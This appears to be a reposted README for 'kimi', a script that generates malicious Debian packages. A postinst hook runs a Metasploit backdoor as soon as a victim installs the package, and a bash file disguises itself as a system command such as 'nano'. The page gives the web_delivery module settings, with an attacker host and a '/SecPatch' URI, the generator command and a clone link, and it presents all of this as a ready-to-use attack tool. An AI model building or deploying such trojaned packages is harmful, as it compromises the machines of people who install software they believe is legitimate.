kimi – Malicious Debian Package generator

Script to generate malicious debian packages (debain trojans).

About

Kimi is name inspired from “Kimimaro” one of my favorite characters from anime called “Naruto”.

Kimi is a script which generates Malicious Debian package for Metasploit which consists of bash file. the bash file is deployed into “/usr/local/bin/” directory.

Backdoor gets executed just when a victim tries to install deb package due to postinst file

Bash file injects and also acts like some system command which when executed by victim and attacker hits with the session.

Changelog v1.2

[April-24-2019] – Test Release.
— Now custom URI and LPORT can be set
— Python payload has been updated according to python 2/3 and latest version of Metasploit 5 too.
— Whole code is re-implemented though it’s still supporting python 2.7

Plus Points

— Fully independent. Means user no need to install any Debian package creator
— Can be integrated with any payload generator easily due to engagements of argument (lame 😛 I know)

Usage

Kimi basically depends upon web_delivery module and everything is automated.
all the attacker needs are to do following settings :

Setting up Web_Delivery in msf :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Generating Malicious payload :

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0

NOTE:: This project was made to be integrated with Venom Shellcode Generator 1.0.13.
It can be used standalone also all user needs is to change uripath in msf variables

————————————————————————————-

Download

git clone https://github.com/ChaitanyaHaritash/kimi.git

Tutorial

Demo

Source: https://github.com/ChaitanyaHaritash/